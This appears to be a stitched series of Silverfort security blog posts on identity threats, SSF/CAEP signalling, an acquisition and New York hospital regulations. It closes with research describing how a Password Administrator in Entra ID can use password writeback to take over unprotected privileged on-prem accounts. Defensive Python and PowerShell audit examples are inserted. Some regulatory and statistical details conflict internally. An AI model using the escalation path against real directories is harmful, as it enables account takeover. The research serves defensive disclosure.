With 23% of C3 incidents involving compromised accounts or credentials, credential theft remains a significant threat. Silverfort addresses this by:

- Eliminating reliance on static passwords through adaptive MFA, ideally with phishing-resistant methods such as FIDO2 and passkeys.
- Detecting anomalous behavior that may indicate credential compromise.
- Preventing lateral movement within the network.

3. Critical Infrastructure Protection

Critical infrastructure sectors, including electricity, gas, water and waste services, accounted for 11% of all cybersecurity incidents.
The most frequently reported sectors were electricity, gas, water, and waste services (30%), education and training (17%), and transport, postal, and warehousing (15%). Silverfort helps protect these vital services by:

- Securing access to critical systems and data.
- Providing visibility into all authentication attempts.
- Enforcing strict access policies so that only authorized users can reach sensitive resources.
- Addressing the top incident type for critical infrastructure, compromised accounts or credentials (32%), by preventing unauthorized access and detecting compromised credentials.
- Applying the same protection to government entities (federal, state, and local), where compromised accounts or credentials likewise accounted for 30% of incidents.

4. Addressing Common Cyberattack Techniques

The report highlights the growing threat of credential stuffing and password spraying, both forms of brute-force attack. In FY2023–24, the Office of the Australian Information Commissioner (OAIC) received over 1,000 notifications of data breaches involving personal information likely to result in serious harm, a 13% increase from FY2022–23. Furthermore, 8% of incidents handled by ASD in FY2023–24 involved brute force. Silverfort’s platform handles these threats by:

- Identifying and blocking high-volume automated attacks.
- Applying risk-based authentication to challenge suspicious login attempts.
- Integrating with existing security infrastructure to enhance overall protection.

5. Quishing: The Unseen Threat in QR Code Technology

Quishing, or phishing via QR codes, is an emerging threat. In FY2023–24, ASD responded to 30 quishing incidents, a clear sign of new forms of social engineering. Silverfort can help mitigate this risk by:

- Validating the authenticity of login requests initiated through QR codes.
- Ensuring MFA is applied to all authentication attempts regardless of the method used, preferably with phishing-resistant MFA methods such as FIDO2 and passkeys.

Silverfort’s Unified Identity Security platform is well positioned to address the identity-related aspects of the threats outlined in the ASD ACSC Annual Cyber Threat Report 2023-2024. By using its authentication and access controls, organizations can significantly strengthen their security posture against today’s most pressing cyber threats.

---
- Published: 2024-11-19
- Modified: 2024-11-26
- URL: https://www.silverfort.com/blog/do-you-have-all-the-identity-security-signals-and-controls-to-make-ssf-caep-work/

Every day, your Active Directory processes millions of authentication requests, permission changes and access events. Hidden within this flood of activity are the subtle patterns of potential attacks: authentication downgrades, unusual service account behavior and suspicious access attempts. Your security tools may detect these signals, but as frameworks like the Shared Signals Framework (SSF) and its Continuous Access Evaluation Profile (CAEP) emerge to connect security tools, organizations must ask whether their existing solutions have the fundamental capabilities needed to make these frameworks effective.

Today’s Security Integration Challenges: A Perfect Storm of Change

Enterprise security leaders stand at a critical inflection point. The promise of seamless integration between security tools is finally within reach, but success requires more than implementing new frameworks. Organizations must fundamentally rethink how their security solutions work together to detect, share, and respond to threats across traditional security boundaries.
This rethinking comes at a crucial moment, driven by three shifts that will transform our approach to integration:

- First shift: the rapid adoption of hybrid work and cloud services has dissolved traditional security boundaries, forcing tools to adapt beyond their original domains. The identity perimeter has become dynamic and fluid; a single user now accesses resources from multiple locations, devices and networks, often simultaneously.
- Second shift: the acute shortage of security talent has made manual correlation and response workflows unsustainable. Security teams can no longer keep pace with the volume of alerts and the complexity of threats through manual analysis and response.
- Third shift: the maturation of security automation, standardized APIs and machine learning has made real-time cross-tool coordination technically feasible. Where previous integration attempts focused on sharing data after the fact, SSF and CAEP are the first real opportunity to build a connected security ecosystem that can match the speed and scale of modern threats.

The Evolution of Security Operations

At its heart, security operations follow a straightforward flow: monitor activity, identify risks, and enforce protective actions. In endpoint security, for example, we watch process creation and file system changes, spot malicious patterns, and respond by blocking execution or isolating systems. Network security works the same way: watch traffic patterns, catch anomalous data flows and enforce access controls. This approach works well as long as we are looking at a single security domain.
Let’s break down a real-world example of how a modern attack slips through disconnected security tools, in a 15-minute attack window:

- Initial Access (9:15 AM): an employee opens a malicious PDF, which executes a hidden PowerShell script. Tools see: EDR logs the PDF and PowerShell as low risk; the network sees normal HTTPS traffic.
- Credential Harvesting (9:17 AM): the attacker extracts credentials from memory using Mimikatz. Tools see: Windows logs show LSASS access; EDR flags it as “suspicious” but does not block.
- Privilege Escalation (9:20 AM): a compromised service account accesses a development server. Tools see: AD sees a normal authentication; the SIEM logs multiple successful logins.
- Lateral Movement (9:25 AM): the attacker moves through the network using pass-the-hash. Tools see: NDR notices increased traffic; identity tools see normal authentications.
- Data Exfiltration (9:30 AM): sensitive data leaves through approved cloud storage. Tools see: CASB and DLP observe an authorized user acting within policy.

This is the critical gap that lets attackers move from initial access to data theft in just 15 minutes. Each security tool only sees legitimate-looking pieces of the attack. EDR cannot connect file execution to credential theft. Identity tools miss the link between the service account usage and the initial compromise. Network tools see authenticated access. Cloud security observes authorized actions. Without real-time coordination, the complete attack chain remains invisible until it is too late.

Building the Connected Security Ecosystem

This is where frameworks like SSF and CAEP enter the picture. By embedding standardized communication capabilities within security solutions, these frameworks enable real-time sharing of security signals across different tools and vendors. Think of it as a universal security language: when an EDR tool detects suspicious process execution, it immediately transmits this information as a standardized SSF event that all other tools understand.
Network security tools can consume this signal instantly, correlate it with traffic patterns and share back their own enriched observations. Identity security solutions receive the same signals, add user risk context and contribute authentication patterns to the shared picture.

Instead of complex point-to-point integrations, organizations can build a unified security fabric in which threats trigger immediate cross-domain responses through SSF event streams flowing from transmitters to receivers.

However, this real-time communication framework only delivers value when security tools can both generate comprehensive signals and translate them into automated actions. Having the pipes to share information means nothing if your tools cannot speak the language or act on what they hear.

Identity Security: From Detection to Response

The identity security domain illustrates these requirements well. With Active Directory processing countless authentication and access events, organizations need both comprehensive visibility and rapid response. Your identity security solutions must detect suspicious access patterns between resources in real time, flag multiple failed authentication attempts immediately, and recognize when a user is accessing an unusual number of destinations in a short period. But detection alone is not enough: your security stack needs to act on these signals. That means immediately restricting access for compromised accounts, requiring additional authentication when risk rises, automatically isolating systems to contain the attack, and alerting security teams with full context through multiple channels. Your tools need to enforce authentication policy in real time and adapt to emerging threats.

Building Your Security Foundation

As you consider implementing SSF and CAEP in your environment, the success of your integration strategy hinges on your tools’ fundamental capabilities.
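The whole loop described in the two sections above, detection on the identity side, a standardized signal, and an automated action on the receiving side, carried through in code. This is an added example and not Silverfort’s code or the OpenID Foundation’s reference implementation: the identity tool detects a service account fanning out to an unusual number of hosts (the “unusual number of destinations in a short period” signal), wraps the finding in a CAEP session-revoked Security Event Token (SET, RFC 8417), and a receiver verifies the token and maps it to actions. Assumptions: the sample events, the ten-minute window and five-host threshold, the issuer and audience URLs, and HMAC-SHA256 with a pre-shared key so that the block runs on the standard library alone (production SSF streams sign SETs with asymmetric JWS keys published via JWKS).

```python
"""Detection -> Shared Signals (SSF/CAEP) event -> receiver action.

Added example, not Silverfort code. Builds a CAEP "session-revoked" SET
(RFC 8417) and verifies it on the receiver. HS256 with a pre-shared key is
an assumption to keep the example stdlib-only; real streams use JWS with
asymmetric keys.
"""
import base64, hashlib, hmac, json, time, uuid
from collections import defaultdict
from datetime import datetime, timedelta

CAEP_SESSION_REVOKED = "https://schemas.openid.net/secevent/caep/event-type/session-revoked"
SHARED_KEY = b"pre-shared-demo-key"   # assumption: demo key only
ISSUER, AUDIENCE = "https://idp.example/ssf", "https://edr.example"   # assumed endpoints

# Constructed sample authentication events (time, account, target host, success).
SAMPLE_EVENTS = [
    ("2024-11-20T09:20:00", "svc-build@corp.example", "DEV-SRV-01",  True),
    ("2024-11-20T09:21:10", "svc-build@corp.example", "DEV-SRV-02",  True),
    ("2024-11-20T09:22:05", "svc-build@corp.example", "FILE-SRV-07", True),
    ("2024-11-20T09:23:40", "svc-build@corp.example", "HR-DB-01",    True),
    ("2024-11-20T09:24:15", "svc-build@corp.example", "DC-02",       True),
    ("2024-11-20T09:24:50", "svc-build@corp.example", "BACKUP-01",   True),
    ("2024-11-20T09:25:00", "j.doe@corp.example",     "MAIL-01",     True),
]

# --- detection side: the signal the identity tool has to be able to produce ---
def detect_fanout(events, window=timedelta(minutes=10), max_targets=5):
    """Accounts that reached more than max_targets distinct hosts inside one window."""
    by_user = defaultdict(list)
    for ts, user, target, ok in events:
        if ok:
            by_user[user].append((datetime.fromisoformat(ts), target))
    findings = {}
    for user, rows in by_user.items():
        rows.sort()
        for i, (t0, _) in enumerate(rows):
            targets = {tgt for t, tgt in rows[i:] if t - t0 <= window}
            if len(targets) > max_targets:
                findings[user] = sorted(targets)
                break
    return findings

# --- transmitter side: wrap the finding in a Security Event Token ---
def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def build_session_revoked_set(issuer, audience, account, reason, key, now=None):
    """Return a compact JWS (HS256) carrying one CAEP session-revoked event."""
    now = int(now if now is not None else time.time())
    payload = {
        "iss": issuer, "aud": audience, "jti": uuid.uuid4().hex, "iat": now,
        "events": {CAEP_SESSION_REVOKED: {
            "subject": {"format": "email", "email": account},
            "event_timestamp": now,
            "reason_admin": {"en": reason},
        }},
    }
    header = {"alg": "HS256", "typ": "secevent+jwt"}
    signing_input = (_b64url(json.dumps(header, separators=(",", ":")).encode()) + "."
                     + _b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)

# --- receiver side: verify the SET, then act on it ---
def parse_and_verify_set(token, key, expected_iss, expected_aud, max_age=300, now=None):
    """Check typ/alg, signature, issuer, audience and freshness; return the payload."""
    h, p, s = token.split(".")
    header = json.loads(_b64url_decode(h))
    if header.get("typ") != "secevent+jwt" or header.get("alg") != "HS256":
        raise ValueError("not an HS256 security event token")
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s)):
        raise ValueError("bad signature")
    payload = json.loads(_b64url_decode(p))
    if payload.get("iss") != expected_iss or payload.get("aud") != expected_aud:
        raise ValueError("unexpected issuer or audience")
    now = now if now is not None else time.time()
    if not (now - max_age <= payload["iat"] <= now + 60):   # small clock-skew allowance
        raise ValueError("token too old or from the future")
    return payload

def set_is_valid(token, key, expected_iss, expected_aud, now=None) -> bool:
    try:
        parse_and_verify_set(token, key, expected_iss, expected_aud, now=now)
        return True
    except (ValueError, KeyError):
        return False

def receiver_actions(payload):
    """Map each CAEP event to this receiver's response (an assumed local policy)."""
    actions = []
    for event_type, body in payload["events"].items():
        who = body["subject"].get("email") or body["subject"].get("sub")
        if event_type == CAEP_SESSION_REVOKED:
            actions += [("revoke_sessions", who), ("require_mfa_on_next_access", who)]
        else:
            actions.append(("log_only", who))
    return actions

def run_pipeline(events=SAMPLE_EVENTS, key=SHARED_KEY, now=None):
    """Detect -> emit SET -> verify -> act. Returns the actions the receiver took."""
    actions = []
    for account, targets in detect_fanout(events).items():
        token = build_session_revoked_set(ISSUER, AUDIENCE, account,
                                          f"accessed {len(targets)} hosts within 10 minutes", key, now)
        actions += receiver_actions(parse_and_verify_set(token, key, ISSUER, AUDIENCE, now=now))
    return actions

if __name__ == "__main__":
    for action, who in run_pipeline():
        print(f"{action}: {who}")
```

The receiver deliberately rejects anything whose header is not `secevent+jwt`, whose signature does not verify, whose issuer or audience is wrong, or whose `iat` is stale; an SSF receiver that skips any of these checks can be driven to revoke sessions by anyone able to post to its endpoint. The detection threshold is the part that needs local tuning: backup and monitoring service accounts legitimately touch many hosts, so in practice the baseline is per account rather than a single global number.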
Most organizations focus first on the technical aspects of framework implementation: the APIs, the message formats, the integration architecture. But two questions must be answered first:

- Does your current security stack provide all the essential signals these frameworks require?
- Can your tools translate detections into meaningful automated responses?

Security tools today are good at spotting problems, but that is only half the story. For frameworks like SSF and CAEP to work, your tools need to do more than detect: they need to share what they find and act automatically. Without these basic capabilities, even the most advanced integration plans will not deliver real security value.

When the next attack comes, and it will, will your security tools be ready to share the signals that matter and take the actions needed to stop it? That is the question you need to answer today.

---
- Published: 2024-11-13
- Modified: 2024-11-21
- URL: https://www.silverfort.com/blog/silverfort-acquires-rezonate-cloud-identity-security/

We’re excited to welcome Rezonate to the Silverfort team, expanding our identity security platform deeper into cloud environments and breaking down the traditional silos of identity security, on-prem and in the cloud, for human and non-human identities.

Building Silverfort has been an incredible journey. It started in 2016 with the belief that identity security would become the most important element of cybersecurity, and that defending against evolving threats would require an entirely new approach. This conviction led my fellow co-founders and me to explore new ideas and invent the technology that made our approach possible: identity security everywhere, seamlessly.

It has been a journey of firsts. From finding the first customers and partners who believed in our vision and trusted us to deliver it, to achieving and exceeding 100% year-on-year growth for several years now.
From convincing our first employees to join this adventure (most of them are still with Silverfort today) to being named the #1 best startup to work for by Dun & Bradstreet. Each step we take together reinforces my belief in the power of teamwork and innovation and reminds me how privileged I am to share this journey with such remarkable people.

Today, I’m excited to announce another first: Silverfort is acquiring Rezonate.

Rezonate: Innovator in cloud identity security

Rezonate’s team lives and breathes identity security. They bring deep expertise in this space, with a clear focus on cloud environments. Thanks to their expertise, talent, and hard work, their product offers the most impressive set of cloud identity security capabilities we have seen from any early-stage startup.

Their offering includes Non-Human Identity (NHI) security, Identity Threat Detection and Response (ITDR), Identity Security Posture Management (ISPM), entitlement management and more. Their coverage spans all cloud assets, including cloud identity providers (IdPs), cloud infrastructure, and SaaS applications. Rezonate’s architecture also lets them flex and scale to meet every customer’s needs with unmatched speed and simplicity, and customers love them for it. Our teams share a vision to solve identity security once and for all, and finally give organizations an end-to-end answer to this problem from the single platform they deserve. As Roy Akerman, CEO and Co-Founder of Rezonate, puts it:

“To stay ahead of rapidly evolving identity threats, organizations need a single platform that solves this problem holistically, not in silos. They want it to come from a partner that truly understands identity security. Silverfort is on a clear path to lead this market because it breaks the old paradigms, innovates faster than anyone else, and has a team that is hyper-focused on this mission.
We couldn’t be more excited to join them and build the most complete identity security platform in the industry together.”

Protecting Every Dimension of Identity with a Unified Platform

Organizations now realize that identity security isn’t just another element of cybersecurity: it creates the most essential conditions for success. Yet for decades identity security has been treated as a feature of the identity infrastructure, and has therefore remained siloed. If a compromised user account fails to authenticate in one environment, the attacker can still use it in other environments within the same organization, because each infrastructure provider only covers its own piece of the puzzle. With a glut of point solutions that focus on either cloud or on-prem, or on one narrow part of the problem, it’s clearly time for a more holistic approach.

We started Silverfort because we knew identity security needed to be done differently. To bring modern security everywhere, to every corner of the fragmented identity infrastructure, security must be delivered as a seamless layer; it cannot be implemented system by system. Making this possible required inventing an entirely new technology. We spent years under the radar building the platform that would change this market and deliver a unified, end-to-end approach to identity security.

This time and focus have served us well: we now have the broadest and most advanced platform in the identity security market, we are growing faster than any other company in this category, and we are trusted by almost a thousand of the world’s leading enterprises, including many of the Fortune 50. We are now ready to seize the opportunity and move even faster towards market leadership. The acquisition of Rezonate is another significant step towards this vision.
It expands our capabilities deeper into cloud environments and, combined with our existing offering, will let our customers enjoy the first true end-to-end identity security platform in the market. We plan to finish integrating Rezonate’s technology into our unified platform in mid-2025.

Today’s news is a major milestone in our quest to reinvent identity security and lead this fast-growing market. We could not have done it without the support of our customers, partners, investors and, of course, our extraordinary team. Thank you all for joining us and helping us build this company.

Most importantly, from everyone at Silverfort: Welcome to the team, Rezonate! We look forward to creating something amazing together.

---
- Published: 2024-11-06
- Modified: 2024-11-06
- URL: https://www.silverfort.com/blog/new-cybersecurity-regulations-in-new-york-what-general-hospitals-must-do-to-stay-compliant/

Every general hospital in New York State is now facing a significant shift in its cybersecurity requirements. As of October 2, 2024, the New York State Department of Health has introduced comprehensive amendments to Part 405.3 that mandate stronger cybersecurity controls for all 195 general hospitals in the state. Hospitals must comply by October 2, 2025. The new regulations require all general hospitals to implement advanced cybersecurity programs and follow new incident reporting protocols, including a 72-hour window for reporting significant cybersecurity incidents. In today’s healthcare landscape, where systems and services manage everything from patient records to critical care equipment, these requirements are an important step toward protecting healthcare infrastructure. Let’s explore what these changes mean for general hospitals and how Silverfort can help.

Understanding 10 NYCRR 405.46

Introduced by the New York State Department of Health (DOH) in 1999, 10 NYCRR 405.46 initially focused on protecting patient rights in hospital settings, particularly regarding the use of restraints and seclusion. As technology became integral to healthcare operations, the regulation evolved to address the growing risk of cyber attacks against healthcare data and systems. Under 10 NYCRR 405.46, healthcare facilities are required to implement comprehensive cybersecurity measures to protect sensitive patient information and critical hospital infrastructure. Until October 2024, these measures included data encryption, access controls, and continuous monitoring of electronic health records (EHRs). This ensured that hospitals maintained rigorous data protection standards, reinforcing both patient privacy and the resilience of healthcare systems against cyber threats. By mandating proactive cybersecurity standards, New York State supported hospitals in upholding the privacy and safety of their patients and demonstrated its commitment to adapting healthcare regulation to emerging cybersecurity challenges.

New York State’s New Cybersecurity Mandates for Hospitals: 10 NYCRR 405.46

In early October 2024 the New York State Department of Health announced new regulations under 10 NYCRR 405.46, mandating stronger cybersecurity protections across New York’s 195 general hospitals. Full compliance is required by October 2, 2025, although hospitals have had to report cybersecurity incidents within 72 hours since October 2, 2024. The regulation targets the protection of patient health information (PHI) and personally identifiable information (PII) against cyber threats.

Key Components:

- Cybersecurity Program: hospitals must implement a robust cybersecurity program that includes network monitoring, incident response, training, and policy development.
- Chief Information Security Officer (CISO): hospitals must appoint a CISO, either as a direct employee or a third-party contractor, to oversee cybersecurity measures.
- Testing and Vulnerability Assessments: regular testing, including scans and penetration assessments, is required to manage cybersecurity risks.
- Audit Trails and Records: hospitals must maintain audit trails to detect and respond to cyber incidents, and securely retain records.
- Incident Response: a detailed response plan is mandatory, with incident reporting to the Department of Health within 72 hours.
- Access Control Measures: requirements include enforcing multi-factor authentication (MFA) for external systems, limiting privileged account use, annual access reviews, and tailored cybersecurity training.

Mandates and State Support:

- Annual Access Review: hospitals must annually review and remove unnecessary user access, which poses challenges for legacy accounts.
- Funding and Insurance Impact: New York has allocated $500 million to support compliance, with potential impacts on cyber insurance terms.

Through these mandates, New York aims to strengthen healthcare cybersecurity and support hospitals in protecting patient data from evolving cyber threats.

Resolve Every 10 NYCRR 405.46 Identity Security Requirement with Silverfort

Silverfort equips hospitals to meet New York’s new cybersecurity mandates with efficient, cost-effective identity security capabilities tailored to healthcare environments. By integrating Silverfort’s capabilities into your cybersecurity program, you can address each 10 NYCRR 405.46 identity requirement by:

- Extending MFA protection to command-line access, legacy apps, IT infrastructure, and other critical resources that could not be protected before.
- Applying strong access controls by enforcing MFA across all sensitive resources, ensuring only authorized users can access critical systems and data.
- Enforcing MFA or access-block policies on all privileged users, both human admins and service accounts, so that they have access only when necessary, a key component of privileged access security.
- Continuously monitoring all access requests to detect anomalies and prevent malicious access in real time.
- Detecting identity threats such as privilege escalation and lateral movement, and responding automatically with real-time blocking.

With Silverfort’s rapid incident detection, hospitals can meet the 72-hour reporting requirement by identifying cybersecurity incidents quickly. Silverfort also supports comprehensive risk assessments and offers tools that help newly appointed CISOs manage a full security program. Designed with healthcare environments in mind, Silverfort addresses industry-specific threats and prepares hospitals for future regulations by implementing scalable identity security controls aligned with security best practices.

Download our white paper to learn more about how Silverfort can assist you in meeting the requirements of 10 NYCRR 405.46, or schedule a call with one of our experts.

---
- Published: 2024-10-31
- Modified: 2024-11-06
- URL: https://www.silverfort.com/blog/exploiting-weaknesses-in-entra-id-account-synchronization-to-compromise-the-on-prem-environment/

Active Directory (AD) is Microsoft’s directory service for managing users and their permissions within an organization. It is installed on a Windows Server, turning it into a Domain Controller that manages the enterprise environment: storing all user accounts, their password hashes and permissions, and handling user authentication.
Over time, the world has been moving steadily toward cloud adoption, and Microsoft has been pushing organizations to shift to cloud-based environments for more streamlined, modern identity management. Microsoft's solution for a cloud-based domain environment is Entra ID. It extends the capabilities of on-premises AD to the cloud, providing a robust solution for managing identities and access for cloud-based applications.

To enable seamless integration with legacy systems, Microsoft introduced Entra ID Connect. This tool lets organizations link their on-premises Active Directory (AD) environment with Entra ID, creating a "hybrid joined environment".

Through Entra ID Connect, organizations can synchronize users and directory data from their on-premises AD to the cloud. This lets users access cloud services with the same credentials they use for on-premises systems. One interesting feature Entra ID Connect supports is password writeback, where password changes made in the cloud are synced back to the on-premises AD, keeping identity management consistent across both environments. This hybrid model lets organizations maintain a unified identity system while operating across both cloud and on-premises infrastructure.

The differences in permission management between legacy Active Directory and Entra ID can lead to security gaps in the synchronization process between the two products.

### Deep Dive into Permission Management

Permission management in Active Directory works as follows: each environment ships with several default privileged security groups that hold elevated permissions to make changes. To grant a specific user these permissions, we simply add them to the group. For example, the "Domain Admins" group grants its privileges to every member. Another method for defining permissions for users or groups is the ACL (Access Control List).
This list exists for each object in AD and specifies the permissions each entity holds over it. This mechanism allows permissions to be assigned to a regular user to modify objects, even objects belonging to users with high-level privileges such as Domain Admins.

In Entra ID (formerly Azure AD), however, there are no security groups by default. Instead, it uses an RBAC (Role-Based Access Control) mechanism: there are many types of roles, each defining a different set of user permissions. You can also assign a role to a group, and all members of that group inherit the same permissions. But this option does not come with default groups the way Active Directory does.

So, what's the difference between the two mechanisms? In Entra, modification protection is applied when a user receives privileged permissions by role or group assignment. In legacy AD, we discovered that not all sensitive groups are protected from modifications. In fact, certain sensitive groups are treated as weak when it comes to Entra ID Connect synchronization.

In Entra, whenever a user receives a privileged role, they are automatically granted modification protection. Only a user with a higher-level or equivalent role can make changes, and any user with a lower role level is prevented from doing so. This means the user doesn't have to be a member of a security group to be protected; simply assigning them a privileged role is enough to provide some level of protection, unlike in AD.

For example, in the hierarchy of administrator roles within Entra ID, the Password Administrator role grants users the ability to reset passwords. However, despite being categorized as an administrator, this role is considered one of the lowest in the admin hierarchy. As a result, Password Administrators can only reset passwords for regular users or for users holding the same admin role.
They do not have the authority to reset passwords for users in higher-level administrator roles, such as Global Administrators or other privileged accounts, which maintains a clear security boundary between admin roles. This hierarchical structure ensures that more sensitive roles are protected from unauthorized password changes.

Figure: Password Administrator role

### How Does Synchronization Happen?

The synchronization process between on-premises AD and Entra ID can be divided into two main parts:

1. Syncing identities from on-premises to Entra ID
2. Password writeback from Entra ID to on-premises

### Part 1: Syncing from On-Premises to Entra ID

Entra ID Connect creates a service account named MSOL followed by the first 8 bytes of the installation identifier. This account has powerful capabilities that may be equivalent to those of a Domain Controller. The "Replicating Directory Changes All" permission allows it to perform a DCSync and extract all of an object's attributes, including the client's credentials, in other words its NT hash. Because of the extensive permissions granted to this account across the directory, it can access and read information about users in protected groups: the permissions let it operate with Domain Controller-like privileges. Consequently, even if the account is not explicitly listed in a group's ACL, it can still retrieve the NT hashes of the group's members. This permission enables the on-premises side of the synchronization process and is exercised through the Directory Replication Service Remote Protocol, which runs over RPC transport. The same protocol is used to perform the DCSync attack.

The on-premises sync agent sends all user information and attributes to Entra ID over port 443. Once Entra receives this data, it processes it and populates the necessary details within its environment, completing the initial synchronization.
### Part 2: Password Writeback from Entra ID to On-Premises

The second part of the synchronization process takes place when Password Writeback is enabled in Entra ID Connect. This feature allows password synchronization from the cloud to the on-premises environment, so that when a user changes their password in the cloud, the change is also reflected on-premises. This keeps the two environments in sync, which is one of the main reasons for connecting them: to let users log in with the same password across all applications and environments in the organization.

When a password reset is initiated for a user in Entra ID, the system first searches for the username to verify that it exists in Entra ID. If the user is found, a permissions check is performed to see whether the person attempting the reset holds a role that allows the action. If they have the necessary permissions, Entra ID sends the username and the new password to the Entra Service Bus.

The sync agent running on-premises retrieves this information. Since the MSOL account created by Entra ID Connect has DCSync permissions for reading only, it does not use the RPC protocol to reset the password. Instead, it performs an LDAP request to locate the corresponding user in Active Directory and attempts to update the password using the "IADsUser.ChangePassword" operation.

At this stage, a crucial security check is performed: when the LDAP request is received by the domain controller (DC), the Active Directory permissions system checks whether the account attempting the password change has the necessary permissions to reset the target user's password. This is done by examining the target user's ACL. If the MSOL account does not have the "Reset Password" permission over the object, an error is sent back to Entra ID indicating that the password update failed due to insufficient permissions.
If the "Reset Password" permission is present, the password change completes successfully.

### The Security Gap

During the synchronization process, I noticed that there is no full coverage of which users belong to privileged groups or hold higher permissions. Consequently, in the Entra environment these users do not automatically receive the same privileged status they have on-premises. By default, hybrid users do not receive the same protection as privileged roles in Entra during initial synchronization, unless the network administrator manually assigns these privileges and protections within Entra ID.

Understanding the synchronization capabilities between the two environments, and the ability to synchronize credentials back from Entra to on-premises, the question arises: what are the potential risks involved?

The main risk is gaining elevated permissions in on-premises AD through a weak admin role in Entra. In AD, a user can receive privileged permissions without necessarily belonging to a protected group, which leaves them exposed to attacks. The same risk exists in the attack flow here:

Once an attacker gains control over an Entra ID user assigned the Password Administrator role, they can leverage its password reset permission to elevate their permissions, even though that user may not have an on-premises counterpart. By resetting the password of a user with elevated AD permissions, such as a member of the DNS Admins group, they could gain control over the account and potentially escalate privileges within the on-premises domain.

Figure: Reset user passwords

All the attacker needs to do is log in to Entra ID with a user account that has at least the Password Administrator role. It doesn't matter whether they use the interface at https://entra.microsoft.com or https://portal.azure.com. Once logged in, they select the target on-premises user and simply reset their password.
This allows the attacker to log in to the on-premises environment with the account whose password they changed. It is important to note that if the targeted user is part of a protected group in the on-premises environment, the attack fails.

Figure: Failed to reset password of user in protected group

This is because the permission management for protected users on-premises blocks changes by an Entra ID Connect account to users in those protected groups. In an on-premises environment, protected groups can be identified by examining the group's adminCount attribute: if adminCount is set to "1", the group is considered protected. These protected groups follow a fixed permissions template that is periodically enforced. Every hour, a protection mechanism in Active Directory runs a process that checks whether the group's permissions in the ACL match the permissions defined in the template. If there is a discrepancy, the process resets the permissions to align with the template.

Figure: Protected group adminCount attribute

This process is managed by a mechanism called SDProp (Security Descriptor Propagator), and the permissions template is known as AdminSDHolder.

### Attack Scenarios That Exploit This Weakness

#### Shadow Admins

Shadow Admins are users who can reset an admin's password but do not belong to any admin group. Since both on-premises Active Directory and Entra ID treat these Shadow Admins as regular users (without the special protection given to privileged user groups), an attacker can exploit their ability to reset the password of a privileged user in Entra. This means the attacker can also reset that user's password in the on-premises environment.

This scenario provides attackers with a clear pathway to escalate privileges and expand their control across the network, taking advantage of the compromised user's elevated permissions.

#### DNS Admin Group

Another example is the DNS Admin group.
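The adminCount and ACL checks just described can be turned into a defensive audit. The following PowerShell script is an added example, not code from the original post or from Silverfort: it uses the ActiveDirectory RSAT module to enumerate user members of privileged groups (the DnsAdmins and Group Policy Creator Owners groups discussed in this post, plus Domain Admins and Account Operators for comparison), reports whether AdminSDHolder protection applies (adminCount = 1), and checks whether the Entra ID Connect service account holds the Reset Password extended right over each member. The MSOL_* account name pattern and the audited group list are assumptions to adjust to your own environment; the extended-right GUID is the well-known one for User-Force-Change-Password.

```powershell
# Added audit example (not Silverfort's code): find members of privileged AD
# groups that AdminSDHolder/SDProp does not protect and over whom the Entra ID
# Connect service account holds the "Reset Password" extended right.
# Assumptions: the ActiveDirectory RSAT module is installed, the sync account
# follows the MSOL_<installation-id> naming the post describes, and the
# audited group list below fits your tiering model.
Import-Module ActiveDirectory

# Well-known GUID of the "Reset Password" (User-Force-Change-Password) extended right.
$ResetPasswordRight = [guid]'00299570-246d-11d0-a768-00aa006e0529'

# Groups the post discusses plus two well-known groups for comparison (assumption).
$GroupsToAudit = @('DnsAdmins', 'Group Policy Creator Owners', 'Domain Admins', 'Account Operators')

# Entra ID Connect service account(s); the name pattern is an assumption.
$SyncAccounts = @(Get-ADUser -LDAPFilter '(sAMAccountName=MSOL_*)' |
    Select-Object -ExpandProperty SamAccountName)

function Test-ResetPasswordRight {
    # Returns $true if any of $Principals has an Allow ACE on the object that
    # grants the Reset Password extended right (or GenericAll / all extended rights).
    # Deny ACEs and inheritance order are deliberately not evaluated; this is a
    # triage check, not a full effective-permissions calculation.
    param(
        [Parameter(Mandatory)][string]$DistinguishedName,
        [Parameter(Mandatory)][AllowEmptyCollection()][string[]]$Principals
    )
    $rights = [System.DirectoryServices.ActiveDirectoryRights]
    # The AD: PSDrive exposed by the ActiveDirectory module gives us the object's DACL.
    $acl = Get-Acl -Path "AD:\$DistinguishedName"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $grantsReset = $ace.ActiveDirectoryRights.HasFlag($rights::GenericAll) -or
            ($ace.ActiveDirectoryRights.HasFlag($rights::ExtendedRight) -and
             ($ace.ObjectType -eq $ResetPasswordRight -or $ace.ObjectType -eq [guid]::Empty))
        if (-not $grantsReset) { continue }
        # IdentityReference is DOMAIN\name when it resolves; compare the name part.
        $name = $ace.IdentityReference.Value.Split('\')[-1]
        if ($Principals -contains $name) { return $true }
    }
    return $false
}

function Get-WritebackExposure {
    # One row per user member of each audited group, with SDProp protection
    # status and whether the sync account could reset that member's password.
    param([string[]]$Groups, [string[]]$Principals)
    foreach ($groupName in $Groups) {
        $group = Get-ADGroup -Filter "Name -eq '$groupName'" -Properties adminCount
        if (-not $group) { continue }
        $members = Get-ADGroupMember -Identity $group -Recursive | Where-Object { $_.objectClass -eq 'user' }
        foreach ($member in $members) {
            $user = Get-ADUser -Identity $member.DistinguishedName -Properties adminCount
            [pscustomobject]@{
                Group           = $group.Name
                GroupProtected  = ($group.adminCount -eq 1)   # SDProp stamps adminCount=1 on protected objects
                Member          = $user.SamAccountName
                MemberProtected = ($user.adminCount -eq 1)
                SyncCanReset    = Test-ResetPasswordRight -DistinguishedName $user.DistinguishedName -Principals $Principals
            }
        }
    }
}

# Report only the exposure the post describes: a privileged-but-unprotected
# member whose password the sync account (and so a cloud Password Administrator,
# via writeback) can reset.
Get-WritebackExposure -Groups $GroupsToAudit -Principals $SyncAccounts |
    Where-Object { -not $_.MemberProtected -and $_.SyncCanReset } |
    Format-Table Group, Member, GroupProtected, MemberProtected, SyncCanReset -AutoSize
```

Run it with an account that can read the directory. Rows with MemberProtected = False and SyncCanReset = True are exactly the accounts a compromised Password Administrator could reach through password writeback; because SDProp re-stamps protected objects every hour, members of protected groups will normally show SyncCanReset = False even if someone edited their ACL by hand. Review whether each flagged membership is still needed, and treat the remaining members as privileged when assigning roles and protections on the Entra ID side.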
